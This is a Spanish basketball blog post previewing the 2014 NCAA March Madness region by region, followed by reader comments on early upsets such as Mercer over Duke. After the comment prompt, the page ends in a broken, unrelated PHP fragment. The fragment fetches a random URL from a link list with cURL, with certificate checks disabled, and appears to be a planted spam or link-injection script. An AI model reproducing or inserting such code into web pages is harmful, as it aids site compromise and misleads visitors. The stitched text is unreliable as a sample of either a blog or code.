March Madness 2014: Previa

20 de March de 2014 por Ruxixon

Ya se han jugado 4 partidos de la fase previa de la March Madness pero será hoy cuando empiece realmente el baile con los primeros partidos de los favoritos. En tjnba.com no podíamos perdernos un evento tan seguido en USA y más en un año tan señalado por los scooters de la NBA por lo que, como en las últimas ediciones, hemos preparado una previa para que no os perdáis detalle. Queremos agradecer a nuestro compañero Ruxixon que nos haya echado una mano. Su participación (y la de todos) enriquece aún más este blog.

MIDWEST REGION (by Ruxixon)

Muchos aficionados y expertos cuestionan que Wichita State (1) sea un equipo que realmente valga un seed 1 tomando su sencillo calendario de esta temporada como argumento. Lo cierto es que los Shockers de Greg Marshall han acabado el año imbatidos (34-0, el único equipo de la nación en conseguirlo) gracias al buen hacer del senior Cleanthony Early (15.8 ppp-5,9 rpp), el hombre grande del equipo y que ya hizo un gran torneo el año pasado, y los sophomores Ron Baker y Van Vleet (12.1 ppp-5.3 app), de quien se puede decir que es el verdadero líder del equipo sobre la pista y el jugador a seguir. El comité les ha “echado una mano” colocándoles un camino minado con Kentucky y Louisville en el horizonte, después de lo que debe ser un inicio de torneo tranquilo frente la universidad de Cal Poly. A su favor juega el talento y la experiencia del año pasado, ya que gran parte del roster que perdió en semifinales ante a la postre campeones, Louisville, siguen en el equipo. Y están ante la oportunidad de entrar en la historia, pues sólo 7 equipos han conseguido alcanzar el título sin haber perdido ni un solo partido en toda la temporada, el último Indiana en 1976. Un gran aliciente para demostrar de que pasta están hechos.

Kentucky (8) vuelve al March Madness tras su ausencia del año pasado. Con uno de los mejores reclutamientos de la historia, Calipari forma un quinteto integrado por cinco freshman, entre los que destacan el SG proyectado en 1ª ronda del próximo draft, James Young (14.5 ppp), los gemelos Harrison, con Aaron  (13.8 ppp) en su mejor momento de la temporada, y Julius Randle (15.0 – 10.5), a quien los mocks colocan entre el 3-5 del draft. Desde el banquillo estarán respaldados por los sophomores Alex Poythress y Willie Caunley-Stein. La apuesta de cada año por el talento, aunque las dudas sobre la química de equipo (260 del país en cuanto a asistencias y el 310 en cuanto a robos) y la falta de experiencia estarán presentes en cada partido que jueguen. Los Louisville Cardinals (4) de Rick Pitino son un año más una máquina perfectamente engrasada y posiblemente el favorito para alcanzar la Final Four en Nort Texas. Siguen haciendo gala de un gran juego colectivo y una presión asfixiante, herramientas que les llevaron al título la pasada campaña, a pesar de que la temporada para los Cardinals no se presentaba fácil debido a las bajas de jugadores tan importantes como Siva y Dieng (draft) o de Benahan (excluido por violación del reglamento de la universidad). La explosión de Montrezl Harrell (14.2 ppp – 8.2 rpp, proyectado como nº21 del draft) es un plus para un equipo que sigue contando con el huracán Russ Smith (18.3 ppp – 4.3 app), que completa su ciclo universitario liderando al equipo en la tarea anotadora. Las recientes exhibiciones en el torneo final de conferencia, donde han ganado a sus rivales con un margen de 33 puntos de media, confirman que los Cardinals están dispuestos a conseguir el complicado “Repeat”.

Sin Burke ni Hardaway Jr. y sin Mitch McGary, que volvió a sufrir problemas de espalda y tuvo que pasar por el quirófano -se rumorea su vuelta, aunque parece improbable-, Michigan (2) ha acabado líder de la Big 10, aunque la derrota en la final del torneo de conferencia frente a los Spartans deja un sabor amargo de cara al March Madness ya que les privó de ser un seed 1. La seguridad en el tiro es la baza principal de los Wolverines (48 % en FG). En el equipo destaca Nik Stauskas, no sólo por sus números (17.5 ppp, porcentajes >44%) sinó por su liderazgo entre los compañeros. El talón de Aquiles del equipo es el juego interior (nº 299 en rebotes) donde sólo cuentan con Jon Horford (el hermanísimo de Al, jugador de los Hawks) y Jordan Morgan, que son dos jugadores que están ahí para estorbar, atrapar algunos rebotes y poco más. Además son un equipo que se deja recortar ventajas con demasiada facilidad. Si quieren repetir su trayectoria de la temporada pasada (perdieron en la final contra Louisville) tendrán que aparecer las mejores versiones de LeVert  (13.3 ppp – 4.5 rpp) y Glenn Robinson III (13.0 ppp – 4.3 rpp). La apuesta de Coach K por el small ball hace que Duke (3) sea uno de los equipos más anotadores del país. Gran parte de esa anotación llega a través de Rodney Hood (16.4 ppp) y el recruit estrella, Jabari Parker (19.3 ppp – 8.8 rpp), que ocupa habitualmente los minutos de center. La falta de equilibrio en el roster se traduce en escasez de centímetros por lo que podrán tener problemas con el juego interior de los rivales. Las opciones de Duke pasan fundamentalmente por mantener un alto porcentaje de acierto en el tiro, así que los exteriores Cook y Sulaimon tendrán que aparecer junto a las dos figuras del equipo.

Dejando de lado las posibilidades de algún upset, que siempre hacen acto de presencia en la March Madness, habrá que seguir con atención a jugadores que parece serán elegidos en el próximo draft. En el primer partido del torneo, correspondiente a la primera ronda que solo disputan 8 equipos,  TJ Warren (24.8 ppp – 7.2 rpp elegido Jugador del año en la ACC, por encima de Jabari Parker) dejó sus credenciales y lideró a NC State (12) a la victoria gracias a una gran segunda parte en la que anotó 16 puntos. Se enfrentaba a Semaj Christon (17.1 ppp – 4.2 app) un playmaker de buen tamaño, que ve el aro con facilidad y protagoniza highlights con sus pases, aunque eso le lleve a cometer bastantes pérdidas. Precisamente, el martes acabó con 7 y sólo pudo anotar 14 puntos. Otros jugadores a seguir pueden ser Jarnell Stokes (14.7 ppp – 10.3 rpp) de Tennessee, que fue clave en el partido de la fase previa con 18 puntos y 13 rebotes,  o Jahii Carson (18.6 ppp – 4.5 app – 4.0 rpp) de Arizona State (10)

SOUTH REGION (by Txusma)

Los Florida Gators (1) llegan a la March Madness con el cartel de favoritos después de haber sido nominados mejor equipo del país por el comité de expertos de la NCAA. Razones  no les faltaron pues los de Billy Donovan no pierden un partido desde el 2 de diciembre y el pasado domingo se proclamaron campeones del SEC Tournament en un partido frente Kentucky decidido en los últimos instantes. Dirigidos por Scottie Wilbekin (13 ppp, 3.8 app, 1.8 rbpp), un auténtico mariscal de la cancha escogido SEC Player of the Year, los jugadores de Florida forman un equipo muy compacto (hasta 5 jugadores anotan más de 9 puntos por partido), experimentado (sólo 2 freshman en el equipo y con poca participación) y defensivo (sólo permiten 58 puntos por partido). De cara al draft deberíamos fijarnos en Chris Walker que suena en primera ronda pero actualmente no entra en la rotación de 7-8 hombres de Donovan por lo que no podremos verle mucho sobre la cancha.

De todas maneras, el camino de los Gators no será fácil. Han quedado encuadrados en una región en la que ningún equipo puede igualar su consistencia pero en la que todos tienen argumentos para desarmar a cualquiera un día de inspiración. Su máximo rival serían los Kansas Jayhawks (2) si Joel Embiid (11.2 ppp, 8.1 rpp, 2.6 tpp) estuviera al 100%. La participación del pívot camerunés no es segura y de hecho, no cuentan con él hasta el Sweet Sixteen, de aquí 10 días. Hasta el momento, los Jayhawks quedan en manos de un jugador llamado a marcar época en la NBA como Andrew Wiggins (17.4 ppp, 6 rpp)  y de Wayne Selden (10.2 ppp). La baja de Embiid pesa mucho y ni siquiera está claro que sean capaces de ganar sus 2 primeros partidos ya que los Lobos de New Mexico (7) no se lo van a poner nada fácil en tercera ronda y ellos llegan tras haber perdido 3 de sus últimos 5 partidos. Otros que no llegan en su mejor momento son los Syracuse Orange (3) que han entrado en barrena en los últimos días tras haber empezado la temporada con 25 victorias consecutivas. Sin embargo, la zona 2-3 de Jim Boheim siempre da buenos resultados en marzo y con jugadores como Tyler Ennis (12.7 ppp, 5.6 app), Jerami Grant (12.2 ppp, 6.9 rpp; aunque arrastra algunos problemas de espalda) y CJ Fair (16.7 ppp, 6.2 rpp) en el equipo las oportunidades de ir avanzando rondas crecen. Los 4º en discordía serán los UCLA Bruins (4), tal vez los más peligrosos por llegar en un gran momento de forma y con la confianza por las nubes tras ganar a la todopoderosa Arizona en la final de la PAC-12. Todo el caudal ofensivo de los Bruins pasa por las manos de un jugador indescriptible como Kyle Anderson (14.9 ppp, 8.8 rpp, 6.6 app, 1.8 rbpp), un point-forward auténtico de 2’06 que es una auténtica pesadilla para el entrenador rival. ¿A quién pones sobre él? Su visión de juego es fundamental para practicar el juego rápido y vistoso que gusta al equipo y en el que Jordan Adams (17.2 ppp, 5.3 rpp) sobresale. Tampoco podemos dejar de fijarnos en Zach Lavine.

En primera ronda encontramos un partido que se preveé apasionnate: el VCU (5) – SF Austin (12). No os dejéis engañar por la diferencia de seed, SF Austin acumula 28 victorias consecutivas y aunque es cierto que juegan en una de las conferencias más débiles de la nación, llegan por segunda vez en su historia al torneo cargados de moral y con la confianza de poder avanzar un par de rondas. Son dos conjuntos parecidos, no tienen una estrella sinó que basan su fortaleza en el equipo. Cuidado porque VCU perdió en el torneo de su conferencia a su 6º hombre lo que podría suponer una baja muy sensible a estas alturas ya que era parte fundamental del entramado defensivo, ese que su entrenador, Shaka Smart, llama “Wreaking Havoc”. En la conferencia encontramos también a los Ohio State Buckeyes (6) que, a pesar de ya no contar con DeShaun Thomas, son uno de los equipos más experimentados de la mano del alma el equipo, Aaron Craft (9.6 ppp, 4.7 app, 2.5 rbpp) y LaQuinton Ross (15.4 ppp, 6.1 rpp).

En esta región no podemos dejar de seguir a jugadores como Lamar Patterson (17.6 ppp, 4.8 rpp, 4.3 app) de los Pittsburgh Panthers (9), un senior que ha explotado en su último año en la universidad y que a la consistencia propia de los jugadores de Pittburgh ha añadido este año un completo arsenal ofensivo desde la media y larga distancia. Si supera el primer partido, se verá las caras con los Gators contra los que podrá demostrar la pasta de la que está hecho y si merece ser seleccionado en el próximo draft. Otro jugador sobre el que hay que tener puesto un ojo es Dwight Powell (14.2 rpp, 6.9 rpp) de Stanford (10) que suena para la mitad de la 2ª ronda y que tiene ante sí el reto de demostrar a los ojeadores de la NBA el potencial que se le supone.

WEST REGION (by Viva)

Los Arizona Wildcats (1) son los grandes favoritos de esta parte del cuadro. El gran nombre a seguir es Aaron Gordon (12.3 pp – 7.8 rpp) que tiene mucho que demostrar si quieres deslumbrar a los ojeadores de la NBA. Una gran fase final por su parte supondría casi seguro su salto a profesionales. La anotación del equipo la lidera Nick Johnson (Jugador del año en la PAC-12; 16.1 ppp) y el base TJ McConell (8.3 ppp – 5.5 app) es el encargado de armar el juego y elegir entre las multiples opciones de las que dispone ya que fuera de estos 3 nombres aún presentan muchas más armas. Si alguien quiere ganarles tendrá que superar su defensa (sólo reciben 58 ppp) y coger algún rebote ante su poderoso juego interior.

Sin embargo, los escollos que tendrán que superar no serán pocos. Equipos como Wisconsin (2) con Sam Dekker (12.9 ppp – 6.2 rpp) y Frank Kaminsky (13.4 ppp – 6.4 rpp) a la cabeza de un equipo muy ofensivo y que cuida muy bien el balón, o San Diego St. (4) donde hasta 10 jugadores entran en la rotación habitual de manera que son capaces de mantener una intensidad defensiva brutal. Liderados por el senior Xavier Thames (16.9 ppp – 3.1 rpp – 3 app) los Aztecs exigen el máximo a su rival en cada partido. Oklahoma (5) tiene una base formada por varios jugadores veteranos de diferentes perfiles, desde grandes tiradores a jugadores que pelean cada segundo del partido, y entre tanto veterano habrá que prestar atención al pequeñísimo base freshman Jordan Woodard (10.3 ppp – 4.6 app) que es quien puede prender la llama del resto del equipo.

El partido estrella de primera ronda enfrentará a Creighton (3), que cuenta con Doug McDermott (26.5 ppp –  7.2 rpp), el jugador que mayores diferencias marca a nivel ofensivo de todo el país, contra Louisiana (14) que llega tras ganar su región y que cuenta con el base Elfrid Payton (19.3 ppp – 6 rpp – 6 app), una de las sensaciones de la NCAA en el último mes, y el center Shawn Long (19.2 ppp – 10.4 rpp – 2.8 tpp) que es una verdadera amenaza para cualquier defensa. El vencedor de esta serie podría verse en la siguiente ronda con Baylor (6) que dispone de jugadores de gran talento como el forward Cory Jefferson (13.4 ppp y 8.1 rpp) o el atípico center Iasiah Austin (10.6 ppp – 5.5 rpp – 3.1 tpp), ambos con muchas ganas de dejarse ver. Para acabar, no podemos dejar de fijarnos en lo que haga Oklahoma St.(9) y por extensión Marcus Smart (17.9 ppp – 5.6 rpp – 4.7 app – 2.7 rbpp), el cual tiene prácticamente asegurado un puesto en el top5 del próximo draft y sólo una salvaje actuación por su parte en este mes de marzo podría llevarle aun más arriba. Como escudero tendrá a Markel Brown (17.2 ppp – 5.6 rpp – 3 app).

EAST REGION (by Ruxixon)

Los Spartans de Michigan State (4) son los favoritos para alcanzar la FF por la East Region. Los hombres de Tom Izzo llegan sanos al momento clave de la temporada, y recuperando el sabor del éxito tras haber levantado el trofeo de la Big 10 derrotando a los vecinos de Michigan por un margen de 14 puntos, lo que ha acabado por elevar la confianza de un equipo que sufrió algunas derrotas sonrojantes durante las ausencias de Keith Appling (12.3 ppp – 4.6 app) y Adreian Payne (15.8 ppp – 7.4 rpp). Si bien Payne ha recuperado el tono de juego previo a la lesión, siendo una fuerza ofensiva de primer nivel, Appling, que es el motor del equipo, aún no está al 100%. Junto a ellos, Gary Harris (17.1 ppp – 4.2 rpp), jugador que atesora mucho talento y que ha asumido más responsabilidad esta temporada aunque parece que no ha mostrado todo lo que se espera de él. Los grandes jugadores aparecen en este tipo de citas. De cualquier forma, los Spartans destacan por involucrar a todos sus jugadores en el juego y por jugar duro y tienen entre ceja y ceja llegar a la Final Four, teniendo a uno de los mejores entrenadores a nivel universitario.

Por su parte del cuadro se encuentra Virgina (1) que sorprendentemente ha finalizado por encima de Syracuse o Duke en la ACC. Lo cierto es que están lejos de presentar un baloncesto atractivo para el espectador (sólo 65.8 ppp), tampoco tienen jugadores que sean capaces de desequilibrar por sí mismos y quizás conceden más puntos de los necesarios a través de segundas oportunidades. La pregunta en este punto es, ¿cómo puede ser Virginia un seed 1? La respuesta es sencilla y es que cuando no destacas en ataque tienes que ser muy bueno en defensa, y en eso, los Cavaliers, son los mejores, siendo el equipo que menos puntos recibe en toda la NCAA (55.3 ppp).

Por la otra parte del cuadro la cosa está aún más abierta. Villanova (2) ha liderado la Big East con solvencia, mostrando un gran espíritu de equipo. En ese sentido destaca por encima de todos un Darrun Hilliard II (14.3 ppp) que contagia a sus compañeros hasta dejarlo todo sobre el parqué. Es un equipo de naturaleza principalmente ofensiva (78.5 ppp), por lo que en ocasiones descuidan su defensa. Otro equipo que destaca por su apuesta -aún más descarada- por el ataque (82.9 ppp – nº 1 en asistencias con 18.5) es el equipo entrenado por Fred Hoidberg (de quien se dice que es uno de los candidatos a dirigir a los Timberwolves en un futuro), Iowa State (3). Ganadores del torneo de la BIG12 batiendo a Kansas y a Baylor por el camino, son uno de los peores equipos en la March Madness en las estadísticas defensivas y su nivel se reduce cuando no sienten el calor de sus aficionados, algo que sufrirán desde su primer partido en el torneo. Sus jugadores más destacados son Melvin Ejim (F, 18.1 p – 8.5 r), DeAndre Kane (G, 17.0 p – 6.7 r – 5.8 a) y Georges Niang (F, 16.5 p). North Carolina (6) se ha ganado este año el apodo de “matagigantes” tras imponerse a equipos como Louisville, Michigan State, Duke o Kentucky, pero al mismo tiempo ha tenido grandes baches de juego como el que mostraron cayendo en cuartos de la ACC contra Pittsburgh. Es decir, es capaz de lo mejor y de lo peor y esa inconsistencia se paga en este torneo. Marcus Paige (G, 17.4 p – 4.3 a) y James McAdoo (F, 14.2 p – 6.7 r) deberán liderar la versión “buena” de los Tar Heels. Por último Connecticut (7), comandados por el pequeño base Shabazz Napier (G, 17.4 p – 5.9 r – 4.9 a) que ha liderado a su equipo en todas las categorías estadísticas,  tiene la última oportunidad de hacer algo importante antes de la partida de su clase senior, en la que se encuentra el propio Napier. Es una plantilla con calidad y que puede defender fuerte llegado el caso, aunque no son una potencia.

En definitiva, si alguien quiere apostar por alguna sorpresa, la East Region es el lugar para hacerlo. El nivel es muy parejo y la mayoría de duelos reflejarán esta igualdad.

Comenta

16 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Ruxixon tio, trabajazo, gracias. Seguramente no podré ver muchos partidos por falta de tiempo, pero estaré atento a los resúmenes de por aquí y de la pagina de la NCAA.

    Vaya parrafada detallada, grande! Qué calidad de artículo!

      Citar

  2. Denise dice:
    #2

    Pedazo articulo si señor, y no sé que me pasa pero este año tengo mas ganas de seguir la March Madness y el Draft, que los propios Playoffs…
    Por cierto, entiendo que Willie Cauley-Stein es el segundo mejor center de este Draft por detrás de Embiid. ¿No creeis que esta circunstancia puede jugar a su favor y colarse en el Top Ten del Draft en el pick de Cleveland, Denver, ó un par de puestos más en el de Phoenix ó en el segundo pick de Boston?
    Creo que los cms pueden jugar a su favor en vez de la calidad.

      Citar

  3. Denise dice:
    #3

    Pedazo articulo si señor, y no sé que me pasa pero este año tengo mas ganas de seguir la March Madness y el Draft, que los propios Playoffs…
    Por cierto, entiendo que Willie Cauley-Stein es el segundo mejor center de este Draft por detrás de Embiid. ¿No creeis que esta circunstancia puede jugar a su favor y colarse en el Top Ten del Draft en el pick de Cleveland, Denver, ó un par de puestos más en el de Phoenix ó en el segundo pick de Boston?
    Creo que los cms pueden jugar a su favor en vez de la calidad.

      Citar

  4. Ruxixon dice:
    #4

    Gracias,gracias,que no me lleve yo todo el mérito que ahí estuvieron Viva y Txusma currándoselo! Para mí un placer echar una mano,así correspondo,aunque sea un poquito,a lo que la página me aporta cada día.

    Primeros upsets del torneo.Dayton ha ganado de 1 a Ohio State,que se ha jugado la última,como no,a manos de Craft en una penetración a la deseperada.Lo que le falta de calidad a este tio,lo compensa con huevos,siendo finos xD Una pena este final de ciclo universitario para una leyenda de la universidad como es él,que ha pasado de jugar con Evan Turner o Sullinger,considerados la estrella del equipo,a esperar el mismo rendimiento de LaQuinton Ross,del que siempre se ha esperado que llegara a ese status por rendimiento sobre la cancha.Ahora veremos que destino toma Craft que tendrá complicado hacer carrera NBA salvo sorpresa.¿Lo veremos en Europa?

    El segundo upset se acaba de producir ahora mismo,ganando los “empollones” de Harvard a Cincinatti.Kilpatrick se ha echado el equipo a la espalda pero Harvard ha jugado con más temple los minutos finales,dejando el 61-57 favorable a sus intereses.Siempre se ha hablado de esta universidad como un proyecto bastante serio para lo que es la Ivy League (conferencia donde juegan las universidades ricas tipo Princeton,Yale…),con posibilidades de competir contra la mayoría de equipos.De momento repiten lo del año pasado.Los Bears vuelven a caer en 1º ronda.

    Rápido me voy al Oregon – BYU,que a nivel universitario debe dar una orgía de puntos.De momento 47-35.

      Citar

  5. Ruxixon dice:
    #5

    Denise: illie Cauley-Stein es el segundo mejor center de este Draft por detrás de Embiid. ¿No creeis que esta circunstancia puede jugar a su favor y colarse en el Top Ten del Draft en el pick de Cleveland, Denver, ó un par de puestos más en el de Phoenix ó en el segundo pick de Boston?

    Diría que depende bastante de como lo haga en el torneo.Si juega un rol importante en los partidos que vaya ganando Kentucky es posible que suba en los mocks y lo veamos más cercano a la lottery,no hay que olvidar que los tios grandes siempre son bien valorados.Creo que en la final de la SEC ante los Gators hizo un 11-10 o algo así,y aportó bastantes chapas.Actuaciones así son las que debería tener en la Madness.El problema es que por talento otros jugadores están por encima de cara a un TOP10,y luego estamos hablando de un prospect defensivo,y quizás no sea diferencial en ese sentido como para elegirlo tan arriba.

      Citar

  6. txusma dice:
    #6

    Partidazo de Adreian Payne: 41 puntos y 8 rebotes. Billete seguro para la 1ª ronda del draft?

      Citar

  7. Ruxixon dice:
    #7

    El primer día de la segunda ronda en píldoras.

    SOUTH: victoria de Florida(1) sobre Albany(16),hay que levantarse y aplaudir por el gran partido que hicieron estos aguantando en la primera parte y amenazando con dar guerra en la segunda aunque Florida acabo por romper el partido como se podía preveer,aunque sin muchas florituras.Pittburgh (9) apalizando con una gran defensa a Colorado (8),a pesar del ranking no diría que es un upset.Ohio St lo ya comentado,Dayton se las verá con Syracuse que no paso apuros vs W Michigan.CJ Fair y Ennis buenas actuaciones para los Orange.

    EAST: lo de Harvard,que se las verá contra los Spartans,liderados por Payne como dice txusma.Bonito encuentro el que se verá en la siguiente ronda entre Connecticut y Villanova.Los primeros ganando en el OT con Napier haciéndose un 24-8(reb)-6-3.,y los segundos sobrepasando en la 2ª parte a Milwaukee.

    WEST: Oregon y Wisconsin se citan en la siguiente ronda,mostrándose muy superiores en su inicio del gran baile,y San Diego St pasándolo mal contra New Mexico St,con un buen Xavier Thames,pero pasando.No corrio la misma suerte Oklahoma(5) que cayó en la prórroga contra North Dakota St (12),ya tenemos el upset de esta región.

    MIDWEST: el único que avanza sin problemas es Michigan,que se prepara para la lucha contra Texas(apuesto por la sorpresa,aunque no la quiero,que voy con Stauskas & cia,jaja).Una canasta sobre la bocina de Ridley (17-12,con 4 tapones) evitó la prórroga,dejando a Arizona St en la cuneta (Carson 19 con 9 asistencias).Louisville se lleva el duelo -entre maestro y alumno en los banquillos- ante Manhattan y St.Louis sobrevivió en el tiempo extra a NC State,una pena para el equipo de Warren(28 p,8 r) que llegaron en un buen momento.

      Citar

  8. Ruxixon dice:
    #8

    Ojo a Duke que puede caer ante el veterano grupo de Mercer!!!

      Citar

  9. Ruxixon dice:
    #9

    El UPSET del torneo,así en mayúsculas,78-71 para Mercer que se ha cargado a Duke,y creo que si no lo vi mal es la primera victoria de la historia de la universidad en el torneo,está el entrenador que no se lo cree.Naufragio a nivel colectivo en Duke,sólo Sulaimon dando la cara,pero por mencionar al más “famoso”,Parker mal partido,4 de 14 en TC,bien defendido y Coach K sin capacidad de reacción.

      Citar

  10. arivas dice:
    #10

    Vaya palo para Jabari…. esperemos que no quiera quedarse otro añito a sacarse la espina.

    Desde luego esto puede hacerle bajar… ya le colgaran el cartel de perdedor?

      Citar

  11. Jose Luis dice:
    #11

    ufff jabari, vaya tela!

      Citar

  12. Ruxixon dice:
    #12

    McDermott ahí está el solito intentando ganar el partido,lleva 23 puntos-10 rebotes y falta aún 15 minutos para que acabe el tiempo regular.Louisiana Lafayette es un equipo más coral y ahí está.Un partido muy igualado hasta el momento.

    Por cierto que el nº44 de Louisiana,un tal JJ Davenport es un bicho de cuidao,un Schorsianitis en un cuerpo de 1,98.Pesa la criatura más de 140 kg.

      Citar

  13. Ruxixon dice:
    #13

    Ni Parker,ni Wiggins,ni Embiid(que no ha jugado).Se va quedando el torneo sin las figuras del futuro.

      Citar

  14. Ruxixon dice:
    #14

    Y tampoco Smart,que me olvidaba!

      Citar

  15. Denise dice:
    #15

    Pues los Jayhawks de Wiggins y Embiid caen eliminados ante Stanford. Pésimo partido del alero, y el pivot ni siquiera ha jugado.

      Citar

  16. jose santandreu dice:
    #16

    Veo muy fuerte a Kentucky.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>